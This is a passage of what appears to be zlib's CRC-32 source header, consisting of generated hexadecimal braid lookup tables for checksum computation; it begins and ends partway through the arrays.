0x3556700000000000, 0x576e582a00000000, 0xf126205400000000, 0x931e087e00000000, 0xbdb7d0a800000000, 0xdf8ff88200000000, 0x79c780fc00000000, 0x1bffa8d600000000, 0x0e3fa08a00000000, 0x6c0788a000000000, 0xca4ff0de00000000, 0xa877d8f400000000, 0x86de002200000000, 0xe4e6280800000000, 0x42ae507600000000, 0x2096785c00000000, 0x5ffa900000000000, 0x3dc2b82a00000000, 0x9b8ac05400000000, 0xf9b2e87e00000000, 0xd71b30a800000000, 0xb523188200000000, 0x136b60fc00000000, 0x715348d600000000, 0xedb3b04500000000, 0x8f8b986f00000000, 0x29c3e01100000000, 0x4bfbc83b00000000, 0x655210ed00000000, 0x076a38c700000000, 0xa12240b900000000, 0xc31a689300000000, 0xbc7680cf00000000, 0xde4ea8e500000000, 0x7806d09b00000000, 0x1a3ef8b100000000, 0x3497206700000000, 0x56af084d00000000, 0xf0e7703300000000, 0x92df581900000000, 0x8920f0cf00000000, 0xeb18d8e500000000, 0x4d50a09b00000000, 0x2f6888b100000000, 0x01c1506700000000, 0x63f9784d00000000, 0xc5b1003300000000, 0xa789281900000000, 0xd8e5c04500000000, 0xbadde86f00000000, 0x1c95901100000000, 0x7eadb83b00000000, 0x500460ed00000000, 0x323c48c700000000, 0x947430b900000000, 0xf64c189300000000, 0x6aace00000000000, 0x0894c82a00000000, 0xaedcb05400000000, 0xcce4987e00000000, 0xe24d40a800000000, 0x8075688200000000, 0x263d10fc00000000, 
0x440538d600000000, 0x3b69d08a00000000, 0x5951f8a000000000, 0xff1980de00000000, 0x9d21a8f400000000, 0xb388702200000000, 0xd1b0580800000000, 0x77f8207600000000, 0x15c0085c00000000, 0x5d7831ce00000000, 0x3f4019e400000000, 0x9908619a00000000, 0xfb3049b000000000, 0xd599916600000000, 0xb7a1b94c00000000, 0x11e9c13200000000, 0x73d1e91800000000, 0x0cbd014400000000, 0x6e85296e00000000, 0xc8cd511000000000, 0xaaf5793a00000000, 0x845ca1ec00000000, 0xe66489c600000000, 0x402cf1b800000000, 0x2214d99200000000, 0xbef4210100000000, 0xdccc092b00000000, 0x7a84715500000000, 0x18bc597f00000000, 0x361581a900000000, 0x542da98300000000, 0xf265d1fd00000000, 0x905df9d700000000, 0xef31118b00000000, 0x8d0939a100000000, 0x2b4141df00000000, 0x497969f500000000, 0x67d0b12300000000, 0x05e8990900000000, 0xa3a0e17700000000, 0xc198c95d00000000, 0xda67618b00000000, 0xb85f49a100000000, 0x1e1731df00000000, 0x7c2f19f500000000, 0x5286c12300000000, 0x30bee90900000000, 0x96f6917700000000, 0xf4ceb95d00000000, 0x8ba2510100000000, 0xe99a792b00000000, 0x4fd2015500000000, 0x2dea297f00000000, 0x0343f1a900000000, 0x617bd98300000000, 0xc733a1fd00000000, 0xa50b89d700000000, 0x39eb714400000000, 0x5bd3596e00000000, 0xfd9b211000000000, 0x9fa3093a00000000, 0xb10ad1ec00000000, 0xd332f9c600000000, 0x757a81b800000000, 0x1742a99200000000, 0x682e41ce00000000, 0x0a1669e400000000, 0xac5e119a00000000, 0xce6639b000000000, 0xe0cfe16600000000, 0x82f7c94c00000000, 0x24bfb13200000000, 0x4687991800000000, 0x5347914400000000, 0x317fb96e00000000, 0x9737c11000000000, 0xf50fe93a00000000, 0xdba631ec00000000, 0xb99e19c600000000, 0x1fd661b800000000, 0x7dee499200000000, 0x0282a1ce00000000, 0x60ba89e400000000, 0xc6f2f19a00000000, 0xa4cad9b000000000, 0x8a63016600000000, 0xe85b294c00000000, 0x4e13513200000000, 0x2c2b791800000000, 0xb0cb818b00000000, 0xd2f3a9a100000000, 0x74bbd1df00000000, 0x1683f9f500000000, 0x382a212300000000, 0x5a12090900000000, 0xfc5a717700000000, 0x9e62595d00000000, 0xe10eb10100000000, 0x8336992b00000000, 0x257ee15500000000, 
0x4746c97f00000000, 0x69ef11a900000000, 0x0bd7398300000000, 0xad9f41fd00000000, 0xcfa769d700000000, 0xd458c10100000000, 0xb660e92b00000000, 0x1028915500000000, 0x7210b97f00000000, 0x5cb961a900000000, 0x3e81498300000000, 0x98c931fd00000000, 0xfaf119d700000000, 0x859df18b00000000, 0xe7a5d9a100000000, 0x41eda1df00000000, 0x23d589f500000000, 0x0d7c512300000000, 0x6f44790900000000, 0xc90c017700000000, 0xab34295d00000000, 0x37d4d1ce00000000, 0x55ecf9e400000000, 0xf3a4819a00000000, 0x919ca9b000000000, 0xbf35716600000000, 0xdd0d594c00000000, 0x7b45213200000000, 0x197d091800000000, 0x6611e14400000000, 0x0429c96e00000000, 0xa261b11000000000, 0xc059993a00000000, 0xeef041ec00000000, 0x8cc869c600000000, 0x2a8011b800000000, 0x48b8399200000000}, {0x0000000000000000, 0x4c2896a300000000, 0xd9565d9c00000000, 0x957ecb3f00000000, 0xf3abcbe300000000, 0xbf835d4000000000, 0x2afd967f00000000, 0x66d500dc00000000, 0xa751e61c00000000, 0xeb7970bf00000000, 0x7e07bb8000000000, 0x322f2d2300000000, 0x54fa2dff00000000, 0x18d2bb5c00000000, 0x8dac706300000000, 0xc184e6c000000000, 0x4ea3cc3900000000, 0x028b5a9a00000000, 0x97f591a500000000, 0xdbdd070600000000, 0xbd0807da00000000, 0xf120917900000000, 0x645e5a4600000000, 0x2876cce500000000, 0xe9f22a2500000000, 0xa5dabc8600000000, 0x30a477b900000000, 0x7c8ce11a00000000, 0x1a59e1c600000000, 0x5671776500000000, 0xc30fbc5a00000000, 0x8f272af900000000, 0x9c46997300000000, 0xd06e0fd000000000, 0x4510c4ef00000000, 0x0938524c00000000, 0x6fed529000000000, 0x23c5c43300000000, 0xb6bb0f0c00000000, 0xfa9399af00000000, 0x3b177f6f00000000, 0x773fe9cc00000000, 0xe24122f300000000, 0xae69b45000000000, 0xc8bcb48c00000000, 0x8494222f00000000, 0x11eae91000000000, 0x5dc27fb300000000, 0xd2e5554a00000000, 0x9ecdc3e900000000, 0x0bb308d600000000, 0x479b9e7500000000, 0x214e9ea900000000, 0x6d66080a00000000, 0xf818c33500000000, 0xb430559600000000, 0x75b4b35600000000, 0x399c25f500000000, 0xace2eeca00000000, 0xe0ca786900000000, 0x861f78b500000000, 0xca37ee1600000000, 
0x5f49252900000000, 0x1361b38a00000000, 0x388d32e700000000, 0x74a5a44400000000, 0xe1db6f7b00000000, 0xadf3f9d800000000, 0xcb26f90400000000, 0x870e6fa700000000, 0x1270a49800000000, 0x5e58323b00000000, 0x9fdcd4fb00000000, 0xd3f4425800000000, 0x468a896700000000, 0x0aa21fc400000000, 0x6c771f1800000000, 0x205f89bb00000000, 0xb521428400000000, 0xf909d42700000000, 0x762efede00000000, 0x3a06687d00000000, 0xaf78a34200000000, 0xe35035e100000000, 0x8585353d00000000, 0xc9ada39e00000000, 0x5cd368a100000000, 0x10fbfe0200000000, 0xd17f18c200000000, 0x9d578e6100000000, 0x0829455e00000000, 0x4401d3fd00000000, 0x22d4d32100000000, 0x6efc458200000000, 0xfb828ebd00000000, 0xb7aa181e00000000, 0xa4cbab9400000000, 0xe8e33d3700000000, 0x7d9df60800000000, 0x31b560ab00000000, 0x5760607700000000, 0x1b48f6d400000000, 0x8e363deb00000000, 0xc21eab4800000000, 0x039a4d8800000000, 0x4fb2db2b00000000, 0xdacc101400000000, 0x96e486b700000000, 0xf031866b00000000, 0xbc1910c800000000, 0x2967dbf700000000, 0x654f4d5400000000, 0xea6867ad00000000, 0xa640f10e00000000, 0x333e3a3100000000, 0x7f16ac9200000000, 0x19c3ac4e00000000, 0x55eb3aed00000000, 0xc095f1d200000000, 0x8cbd677100000000, 0x4d3981b100000000, 0x0111171200000000, 0x946fdc2d00000000, 0xd8474a8e00000000, 0xbe924a5200000000, 0xf2badcf100000000, 0x67c417ce00000000, 0x2bec816d00000000, 0x311c141500000000, 0x7d3482b600000000, 0xe84a498900000000, 0xa462df2a00000000, 0xc2b7dff600000000, 0x8e9f495500000000, 0x1be1826a00000000, 0x57c914c900000000, 0x964df20900000000, 0xda6564aa00000000, 0x4f1baf9500000000, 0x0333393600000000, 0x65e639ea00000000, 0x29ceaf4900000000, 0xbcb0647600000000, 0xf098f2d500000000, 0x7fbfd82c00000000, 0x33974e8f00000000, 0xa6e985b000000000, 0xeac1131300000000, 0x8c1413cf00000000, 0xc03c856c00000000, 0x55424e5300000000, 0x196ad8f000000000, 0xd8ee3e3000000000, 0x94c6a89300000000, 0x01b863ac00000000, 0x4d90f50f00000000, 0x2b45f5d300000000, 0x676d637000000000, 0xf213a84f00000000, 0xbe3b3eec00000000, 0xad5a8d6600000000, 0xe1721bc500000000, 
0x740cd0fa00000000, 0x3824465900000000, 0x5ef1468500000000, 0x12d9d02600000000, 0x87a71b1900000000, 0xcb8f8dba00000000, 0x0a0b6b7a00000000, 0x4623fdd900000000, 0xd35d36e600000000, 0x9f75a04500000000, 0xf9a0a09900000000, 0xb588363a00000000, 0x20f6fd0500000000, 0x6cde6ba600000000, 0xe3f9415f00000000, 0xafd1d7fc00000000, 0x3aaf1cc300000000, 0x76878a6000000000, 0x10528abc00000000, 0x5c7a1c1f00000000, 0xc904d72000000000, 0x852c418300000000, 0x44a8a74300000000, 0x088031e000000000, 0x9dfefadf00000000, 0xd1d66c7c00000000, 0xb7036ca000000000, 0xfb2bfa0300000000, 0x6e55313c00000000, 0x227da79f00000000, 0x099126f200000000, 0x45b9b05100000000, 0xd0c77b6e00000000, 0x9cefedcd00000000, 0xfa3aed1100000000, 0xb6127bb200000000, 0x236cb08d00000000, 0x6f44262e00000000, 0xaec0c0ee00000000, 0xe2e8564d00000000, 0x77969d7200000000, 0x3bbe0bd100000000, 0x5d6b0b0d00000000, 0x11439dae00000000, 0x843d569100000000, 0xc815c03200000000, 0x4732eacb00000000, 0x0b1a7c6800000000, 0x9e64b75700000000, 0xd24c21f400000000, 0xb499212800000000, 0xf8b1b78b00000000, 0x6dcf7cb400000000, 0x21e7ea1700000000, 0xe0630cd700000000, 0xac4b9a7400000000, 0x3935514b00000000, 0x751dc7e800000000, 0x13c8c73400000000, 0x5fe0519700000000, 0xca9e9aa800000000, 0x86b60c0b00000000, 0x95d7bf8100000000, 0xd9ff292200000000, 0x4c81e21d00000000, 0x00a974be00000000, 0x667c746200000000, 0x2a54e2c100000000, 0xbf2a29fe00000000, 0xf302bf5d00000000, 0x3286599d00000000, 0x7eaecf3e00000000, 0xebd0040100000000, 0xa7f892a200000000, 0xc12d927e00000000, 0x8d0504dd00000000, 0x187bcfe200000000, 0x5453594100000000, 0xdb7473b800000000, 0x975ce51b00000000, 0x02222e2400000000, 0x4e0ab88700000000, 0x28dfb85b00000000, 0x64f72ef800000000, 0xf189e5c700000000, 0xbda1736400000000, 0x7c2595a400000000, 0x300d030700000000, 0xa573c83800000000, 0xe95b5e9b00000000, 0x8f8e5e4700000000, 0xc3a6c8e400000000, 0x56d803db00000000, 0x1af0957800000000}, {0x0000000000000000, 0x939bc97f00000000, 0x263793ff00000000, 0xb5ac5a8000000000, 0x0d68572400000000, 
0x9ef39e5b00000000, 0x2b5fc4db00000000, 0xb8c40da400000000, 0x1ad0ae4800000000, 0x894b673700000000, 0x3ce73db700000000, 0xaf7cf4c800000000, 0x17b8f96c00000000, 0x8423301300000000, 0x318f6a9300000000, 0xa214a3ec00000000, 0x34a05d9100000000, 0xa73b94ee00000000, 0x1297ce6e00000000, 0x810c071100000000, 0x39c80ab500000000, 0xaa53c3ca00000000, 0x1fff994a00000000, 0x8c64503500000000, 0x2e70f3d900000000, 0xbdeb3aa600000000, 0x0847602600000000, 0x9bdca95900000000, 0x2318a4fd00000000, 0xb0836d8200000000, 0x052f370200000000, 0x96b4fe7d00000000, 0x2946caf900000000, 0xbadd038600000000, 0x0f71590600000000, 0x9cea907900000000, 0x242e9ddd00000000, 0xb7b554a200000000, 0x02190e2200000000, 0x9182c75d00000000, 0x339664b100000000, 0xa00dadce00000000, 0x15a1f74e00000000, 0x863a3e3100000000, 0x3efe339500000000, 0xad65faea00000000, 0x18c9a06a00000000, 0x8b52691500000000, 0x1de6976800000000, 0x8e7d5e1700000000, 0x3bd1049700000000, 0xa84acde800000000, 0x108ec04c00000000, 0x8315093300000000, 0x36b953b300000000, 0xa5229acc00000000, 0x0736392000000000, 0x94adf05f00000000, 0x2101aadf00000000, 0xb29a63a000000000, 0x0a5e6e0400000000, 0x99c5a77b00000000, 0x2c69fdfb00000000, 0xbff2348400000000, 0x138ae52800000000, 0x80112c5700000000, 0x35bd76d700000000, 0xa626bfa800000000, 0x1ee2b20c00000000, 0x8d797b7300000000, 0x38d521f300000000, 0xab4ee88c00000000, 0x095a4b6000000000, 0x9ac1821f00000000, 0x2f6dd89f00000000, 0xbcf611e000000000, 0x04321c4400000000, 0x97a9d53b00000000, 0x22058fbb00000000, 0xb19e46c400000000, 0x272ab8b900000000, 0xb4b171c600000000, 0x011d2b4600000000, 0x9286e23900000000, 0x2a42ef9d00000000, 0xb9d926e200000000, 0x0c757c6200000000, 0x9feeb51d00000000, 0x3dfa16f100000000, 0xae61df8e00000000, 0x1bcd850e00000000, 0x88564c7100000000, 0x309241d500000000, 0xa30988aa00000000, 0x16a5d22a00000000, 0x853e1b5500000000, 0x3acc2fd100000000, 0xa957e6ae00000000, 0x1cfbbc2e00000000, 0x8f60755100000000, 0x37a478f500000000, 0xa43fb18a00000000, 0x1193eb0a00000000, 0x8208227500000000, 0x201c819900000000, 
0xb38748e600000000, 0x062b126600000000, 0x95b0db1900000000, 0x2d74d6bd00000000, 0xbeef1fc200000000, 0x0b43454200000000, 0x98d88c3d00000000, 0x0e6c724000000000, 0x9df7bb3f00000000, 0x285be1bf00000000, 0xbbc028c000000000, 0x0304256400000000, 0x909fec1b00000000, 0x2533b69b00000000, 0xb6a87fe400000000, 0x14bcdc0800000000, 0x8727157700000000, 0x328b4ff700000000, 0xa110868800000000, 0x19d48b2c00000000, 0x8a4f425300000000, 0x3fe318d300000000, 0xac78d1ac00000000, 0x2614cb5100000000, 0xb58f022e00000000, 0x002358ae00000000, 0x93b891d100000000, 0x2b7c9c7500000000, 0xb8e7550a00000000, 0x0d4b0f8a00000000, 0x9ed0c6f500000000, 0x3cc4651900000000, 0xaf5fac6600000000, 0x1af3f6e600000000, 0x89683f9900000000, 0x31ac323d00000000, 0xa237fb4200000000, 0x179ba1c200000000, 0x840068bd00000000, 0x12b496c000000000, 0x812f5fbf00000000, 0x3483053f00000000, 0xa718cc4000000000, 0x1fdcc1e400000000, 0x8c47089b00000000, 0x39eb521b00000000, 0xaa709b6400000000, 0x0864388800000000, 0x9bfff1f700000000, 0x2e53ab7700000000, 0xbdc8620800000000, 0x050c6fac00000000, 0x9697a6d300000000, 0x233bfc5300000000, 0xb0a0352c00000000, 0x0f5201a800000000, 0x9cc9c8d700000000, 0x2965925700000000, 0xbafe5b2800000000, 0x023a568c00000000, 0x91a19ff300000000, 0x240dc57300000000, 0xb7960c0c00000000, 0x1582afe000000000, 0x8619669f00000000, 0x33b53c1f00000000, 0xa02ef56000000000, 0x18eaf8c400000000, 0x8b7131bb00000000, 0x3edd6b3b00000000, 0xad46a24400000000, 0x3bf25c3900000000, 0xa869954600000000, 0x1dc5cfc600000000, 0x8e5e06b900000000, 0x369a0b1d00000000, 0xa501c26200000000, 0x10ad98e200000000, 0x8336519d00000000, 0x2122f27100000000, 0xb2b93b0e00000000, 0x0715618e00000000, 0x948ea8f100000000, 0x2c4aa55500000000, 0xbfd16c2a00000000, 0x0a7d36aa00000000, 0x99e6ffd500000000, 0x359e2e7900000000, 0xa605e70600000000, 0x13a9bd8600000000, 0x803274f900000000, 0x38f6795d00000000, 0xab6db02200000000, 0x1ec1eaa200000000, 0x8d5a23dd00000000, 0x2f4e803100000000, 0xbcd5494e00000000, 0x097913ce00000000, 0x9ae2dab100000000, 0x2226d71500000000, 
0xb1bd1e6a00000000, 0x041144ea00000000, 0x978a8d9500000000, 0x013e73e800000000, 0x92a5ba9700000000, 0x2709e01700000000, 0xb492296800000000, 0x0c5624cc00000000, 0x9fcdedb300000000, 0x2a61b73300000000, 0xb9fa7e4c00000000, 0x1beedda000000000, 0x887514df00000000, 0x3dd94e5f00000000, 0xae42872000000000, 0x16868a8400000000, 0x851d43fb00000000, 0x30b1197b00000000, 0xa32ad00400000000, 0x1cd8e48000000000, 0x8f432dff00000000, 0x3aef777f00000000, 0xa974be0000000000, 0x11b0b3a400000000, 0x822b7adb00000000, 0x3787205b00000000, 0xa41ce92400000000, 0x06084ac800000000, 0x959383b700000000, 0x203fd93700000000, 0xb3a4104800000000, 0x0b601dec00000000, 0x98fbd49300000000, 0x2d578e1300000000, 0xbecc476c00000000, 0x2878b91100000000, 0xbbe3706e00000000, 0x0e4f2aee00000000, 0x9dd4e39100000000, 0x2510ee3500000000, 0xb68b274a00000000, 0x03277dca00000000, 0x90bcb4b500000000, 0x32a8175900000000, 0xa133de2600000000, 0x149f84a600000000, 0x87044dd900000000, 0x3fc0407d00000000, 0xac5b890200000000, 0x19f7d38200000000, 0x8a6c1afd00000000}, {0x0000000000000000, 0x650b796900000000, 0xca16f2d200000000, 0xaf1d8bbb00000000, 0xd52b957e00000000, 0xb020ec1700000000, 0x1f3d67ac00000000, 0x7a361ec500000000, 0xaa572afd00000000, 0xcf5c539400000000, 0x6041d82f00000000, 0x054aa14600000000, 0x7f7cbf8300000000, 0x1a77c6ea00000000, 0xb56a4d5100000000, 0xd061343800000000, 0x15a9252100000000, 0x70a25c4800000000, 0xdfbfd7f300000000, 0xbab4ae9a00000000, 0xc082b05f00000000, 0xa589c93600000000, 0x0a94428d00000000, 0x6f9f3be400000000, 0xbffe0fdc00000000, 0xdaf576b500000000, 0x75e8fd0e00000000, 0x10e3846700000000, 0x6ad59aa200000000, 0x0fdee3cb00000000, 0xa0c3687000000000, 0xc5c8111900000000, 0x2a524b4200000000, 0x4f59322b00000000, 0xe044b99000000000, 0x854fc0f900000000, 0xff79de3c00000000, 0x9a72a75500000000, 0x356f2cee00000000, 0x5064558700000000, 0x800561bf00000000, 0xe50e18d600000000, 0x4a13936d00000000, 0x2f18ea0400000000, 0x552ef4c100000000, 0x30258da800000000, 0x9f38061300000000, 0xfa337f7a00000000, 
0x3ffb6e6300000000, 0x5af0170a00000000, 0xf5ed9cb100000000, 0x90e6e5d800000000, 0xead0fb1d00000000, 0x8fdb827400000000, 0x20c609cf00000000, 0x45cd70a600000000, 0x95ac449e00000000, 0xf0a73df700000000, 0x5fbab64c00000000, 0x3ab1cf2500000000, 0x4087d1e000000000, 0x258ca88900000000, 0x8a91233200000000, 0xef9a5a5b00000000, 0x54a4968400000000, 0x31afefed00000000, 0x9eb2645600000000, 0xfbb91d3f00000000, 0x818f03fa00000000, 0xe4847a9300000000, 0x4b99f12800000000, 0x2e92884100000000, 0xfef3bc7900000000, 0x9bf8c51000000000, 0x34e54eab00000000, 0x51ee37c200000000, 0x2bd8290700000000, 0x4ed3506e00000000, 0xe1cedbd500000000, 0x84c5a2bc00000000, 0x410db3a500000000, 0x2406cacc00000000, 0x8b1b417700000000, 0xee10381e00000000, 0x942626db00000000, 0xf12d5fb200000000, 0x5e30d40900000000, 0x3b3bad6000000000, 0xeb5a995800000000, 0x8e51e03100000000, 0x214c6b8a00000000, 0x444712e300000000, 0x3e710c2600000000, 0x5b7a754f00000000, 0xf467fef400000000, 0x916c879d00000000, 0x7ef6ddc600000000, 0x1bfda4af00000000, 0xb4e02f1400000000, 0xd1eb567d00000000, 0xabdd48b800000000, 0xced631d100000000, 0x61cbba6a00000000, 0x04c0c30300000000, 0xd4a1f73b00000000, 0xb1aa8e5200000000, 0x1eb705e900000000, 0x7bbc7c8000000000, 0x018a624500000000, 0x64811b2c00000000, 0xcb9c909700000000, 0xae97e9fe00000000, 0x6b5ff8e700000000, 0x0e54818e00000000, 0xa1490a3500000000, 0xc442735c00000000, 0xbe746d9900000000, 0xdb7f14f000000000, 0x74629f4b00000000, 0x1169e62200000000, 0xc108d21a00000000, 0xa403ab7300000000, 0x0b1e20c800000000, 0x6e1559a100000000, 0x1423476400000000, 0x71283e0d00000000, 0xde35b5b600000000, 0xbb3eccdf00000000, 0xe94e5cd200000000, 0x8c4525bb00000000, 0x2358ae0000000000, 0x4653d76900000000, 0x3c65c9ac00000000, 0x596eb0c500000000, 0xf6733b7e00000000, 0x9378421700000000, 0x4319762f00000000, 0x26120f4600000000, 0x890f84fd00000000, 0xec04fd9400000000, 0x9632e35100000000, 0xf3399a3800000000, 0x5c24118300000000, 0x392f68ea00000000, 0xfce779f300000000, 0x99ec009a00000000, 0x36f18b2100000000, 0x53faf24800000000, 
0x29ccec8d00000000, 0x4cc795e400000000, 0xe3da1e5f00000000, 0x86d1673600000000, 0x56b0530e00000000, 0x33bb2a6700000000, 0x9ca6a1dc00000000, 0xf9add8b500000000, 0x839bc67000000000, 0xe690bf1900000000, 0x498d34a200000000, 0x2c864dcb00000000, 0xc31c179000000000, 0xa6176ef900000000, 0x090ae54200000000, 0x6c019c2b00000000, 0x163782ee00000000, 0x733cfb8700000000, 0xdc21703c00000000, 0xb92a095500000000, 0x694b3d6d00000000, 0x0c40440400000000, 0xa35dcfbf00000000, 0xc656b6d600000000, 0xbc60a81300000000, 0xd96bd17a00000000, 0x76765ac100000000, 0x137d23a800000000, 0xd6b532b100000000, 0xb3be4bd800000000, 0x1ca3c06300000000, 0x79a8b90a00000000, 0x039ea7cf00000000, 0x6695dea600000000, 0xc988551d00000000, 0xac832c7400000000, 0x7ce2184c00000000, 0x19e9612500000000, 0xb6f4ea9e00000000, 0xd3ff93f700000000, 0xa9c98d3200000000, 0xccc2f45b00000000, 0x63df7fe000000000, 0x06d4068900000000, 0xbdeaca5600000000, 0xd8e1b33f00000000, 0x77fc388400000000, 0x12f741ed00000000, 0x68c15f2800000000, 0x0dca264100000000, 0xa2d7adfa00000000, 0xc7dcd49300000000, 0x17bde0ab00000000, 0x72b699c200000000, 0xddab127900000000, 0xb8a06b1000000000, 0xc29675d500000000, 0xa79d0cbc00000000, 0x0880870700000000, 0x6d8bfe6e00000000, 0xa843ef7700000000, 0xcd48961e00000000, 0x62551da500000000, 0x075e64cc00000000, 0x7d687a0900000000, 0x1863036000000000, 0xb77e88db00000000, 0xd275f1b200000000, 0x0214c58a00000000, 0x671fbce300000000, 0xc802375800000000, 0xad094e3100000000, 0xd73f50f400000000, 0xb234299d00000000, 0x1d29a22600000000, 0x7822db4f00000000, 0x97b8811400000000, 0xf2b3f87d00000000, 0x5dae73c600000000, 0x38a50aaf00000000, 0x4293146a00000000, 0x27986d0300000000, 0x8885e6b800000000, 0xed8e9fd100000000, 0x3defabe900000000, 0x58e4d28000000000, 0xf7f9593b00000000, 0x92f2205200000000, 0xe8c43e9700000000, 0x8dcf47fe00000000, 0x22d2cc4500000000, 0x47d9b52c00000000, 0x8211a43500000000, 0xe71add5c00000000, 0x480756e700000000, 0x2d0c2f8e00000000, 0x573a314b00000000, 0x3231482200000000, 0x9d2cc39900000000, 0xf827baf000000000, 
0x28468ec800000000, 0x4d4df7a100000000, 0xe2507c1a00000000, 0x875b057300000000, 0xfd6d1bb600000000, 0x986662df00000000, 0x377be96400000000, 0x5270900d00000000}, {0x0000000000000000, 0xdcecb13d00000000, 0xb8d9637b00000000, 0x6435d24600000000, 0x70b3c7f600000000, 0xac5f76cb00000000, 0xc86aa48d00000000, 0x148615b000000000, 0xa160fe3600000000, 0x7d8c4f0b00000000, 0x19b99d4d00000000, 0xc5552c7000000000, 0xd1d339c000000000, 0x0d3f88fd00000000, 0x690a5abb00000000, 0xb5e6eb8600000000, 0x42c1fc6d00000000, 0x9e2d4d5000000000, 0xfa189f1600000000, 0x26f42e2b00000000, 0x32723b9b00000000, 0xee9e8aa600000000, 0x8aab58e000000000, 0x5647e9dd00000000, 0xe3a1025b00000000, 0x3f4db36600000000, 0x5b78612000000000, 0x8794d01d00000000, 0x9312c5ad00000000, 0x4ffe749000000000, 0x2bcba6d600000000, 0xf72717eb00000000, 0x8482f9db00000000, 0x586e48e600000000, 0x3c5b9aa000000000, 0xe0b72b9d00000000, 0xf4313e2d00000000, 0x28dd8f1000000000, 0x4ce85d5600000000, 0x9004ec6b00000000, 0x25e207ed00000000, 0xf90eb6d000000000, 0x9d3b649600000000, 0x41d7d5ab00000000, 0x5551c01b00000000, 0x89bd712600000000, 0xed88a36000000000, 0x3164125d00000000, 0xc64305b600000000, 0x1aafb48b00000000, 0x7e9a66cd00000000, 0xa276d7f000000000, 0xb6f0c24000000000, 0x6a1c737d00000000, 0x0e29a13b00000000, 0xd2c5100600000000, 0x6723fb8000000000, 0xbbcf4abd00000000, 0xdffa98fb00000000, 0x031629c600000000, 0x17903c7600000000, 0xcb7c8d4b00000000, 0xaf495f0d00000000, 0x73a5ee3000000000, 0x4903826c00000000, 0x95ef335100000000, 0xf1dae11700000000, 0x2d36502a00000000, 0x39b0459a00000000, 0xe55cf4a700000000, 0x816926e100000000, 0x5d8597dc00000000, 0xe8637c5a00000000, 0x348fcd6700000000, 0x50ba1f2100000000, 0x8c56ae1c00000000, 0x98d0bbac00000000, 0x443c0a9100000000, 0x2009d8d700000000, 0xfce569ea00000000, 0x0bc27e0100000000, 0xd72ecf3c00000000, 0xb31b1d7a00000000, 0x6ff7ac4700000000, 0x7b71b9f700000000, 0xa79d08ca00000000, 0xc3a8da8c00000000, 0x1f446bb100000000, 0xaaa2803700000000, 0x764e310a00000000, 0x127be34c00000000, 
0xce97527100000000, 0xda1147c100000000, 0x06fdf6fc00000000, 0x62c824ba00000000, 0xbe24958700000000, 0xcd817bb700000000, 0x116dca8a00000000, 0x755818cc00000000, 0xa9b4a9f100000000, 0xbd32bc4100000000, 0x61de0d7c00000000, 0x05ebdf3a00000000, 0xd9076e0700000000, 0x6ce1858100000000, 0xb00d34bc00000000, 0xd438e6fa00000000, 0x08d457c700000000, 0x1c52427700000000, 0xc0bef34a00000000, 0xa48b210c00000000, 0x7867903100000000, 0x8f4087da00000000, 0x53ac36e700000000, 0x3799e4a100000000, 0xeb75559c00000000, 0xfff3402c00000000, 0x231ff11100000000, 0x472a235700000000, 0x9bc6926a00000000, 0x2e2079ec00000000, 0xf2ccc8d100000000, 0x96f91a9700000000, 0x4a15abaa00000000, 0x5e93be1a00000000, 0x827f0f2700000000, 0xe64add6100000000, 0x3aa66c5c00000000, 0x920604d900000000, 0x4eeab5e400000000, 0x2adf67a200000000, 0xf633d69f00000000, 0xe2b5c32f00000000, 0x3e59721200000000, 0x5a6ca05400000000, 0x8680116900000000, 0x3366faef00000000, 0xef8a4bd200000000, 0x8bbf999400000000, 0x575328a900000000, 0x43d53d1900000000, 0x9f398c2400000000, 0xfb0c5e6200000000, 0x27e0ef5f00000000, 0xd0c7f8b400000000, 0x0c2b498900000000, 0x681e9bcf00000000, 0xb4f22af200000000, 0xa0743f4200000000, 0x7c988e7f00000000, 0x18ad5c3900000000, 0xc441ed0400000000, 0x71a7068200000000, 0xad4bb7bf00000000, 0xc97e65f900000000, 0x1592d4c400000000, 0x0114c17400000000, 0xddf8704900000000, 0xb9cda20f00000000, 0x6521133200000000, 0x1684fd0200000000, 0xca684c3f00000000, 0xae5d9e7900000000, 0x72b12f4400000000, 0x66373af400000000, 0xbadb8bc900000000, 0xdeee598f00000000, 0x0202e8b200000000, 0xb7e4033400000000, 0x6b08b20900000000, 0x0f3d604f00000000, 0xd3d1d17200000000, 0xc757c4c200000000, 0x1bbb75ff00000000, 0x7f8ea7b900000000, 0xa362168400000000, 0x5445016f00000000, 0x88a9b05200000000, 0xec9c621400000000, 0x3070d32900000000, 0x24f6c69900000000, 0xf81a77a400000000, 0x9c2fa5e200000000, 0x40c314df00000000, 0xf525ff5900000000, 0x29c94e6400000000, 0x4dfc9c2200000000, 0x91102d1f00000000, 0x859638af00000000, 0x597a899200000000, 0x3d4f5bd400000000, 
0xe1a3eae900000000, 0xdb0586b500000000, 0x07e9378800000000, 0x63dce5ce00000000, 0xbf3054f300000000, 0xabb6414300000000, 0x775af07e00000000, 0x136f223800000000, 0xcf83930500000000, 0x7a65788300000000, 0xa689c9be00000000, 0xc2bc1bf800000000, 0x1e50aac500000000, 0x0ad6bf7500000000, 0xd63a0e4800000000, 0xb20fdc0e00000000, 0x6ee36d3300000000, 0x99c47ad800000000, 0x4528cbe500000000, 0x211d19a300000000, 0xfdf1a89e00000000, 0xe977bd2e00000000, 0x359b0c1300000000, 0x51aede5500000000, 0x8d426f6800000000, 0x38a484ee00000000, 0xe44835d300000000, 0x807de79500000000, 0x5c9156a800000000, 0x4817431800000000, 0x94fbf22500000000, 0xf0ce206300000000, 0x2c22915e00000000, 0x5f877f6e00000000, 0x836bce5300000000, 0xe75e1c1500000000, 0x3bb2ad2800000000, 0x2f34b89800000000, 0xf3d809a500000000, 0x97eddbe300000000, 0x4b016ade00000000, 0xfee7815800000000, 0x220b306500000000, 0x463ee22300000000, 0x9ad2531e00000000, 0x8e5446ae00000000, 0x52b8f79300000000, 0x368d25d500000000, 0xea6194e800000000, 0x1d46830300000000, 0xc1aa323e00000000, 0xa59fe07800000000, 0x7973514500000000, 0x6df544f500000000, 0xb119f5c800000000, 0xd52c278e00000000, 0x09c096b300000000, 0xbc267d3500000000, 0x60cacc0800000000, 0x04ff1e4e00000000, 0xd813af7300000000, 0xcc95bac300000000, 0x10790bfe00000000, 0x744cd9b800000000, 0xa8a0688500000000}}; #else /* W == 4 */ local const z_crc_t FAR crc_braid_table[][256] = { {0x00000000, 0x81256527, 0xd93bcc0f, 0x581ea928, 0x69069e5f, 0xe823fb78, 0xb03d5250, 0x31183777, 0xd20d3cbe, 0x53285999, 0x0b36f0b1, 0x8a139596, 0xbb0ba2e1, 0x3a2ec7c6, 0x62306eee, 0xe3150bc9, 0x7f6b7f3d, 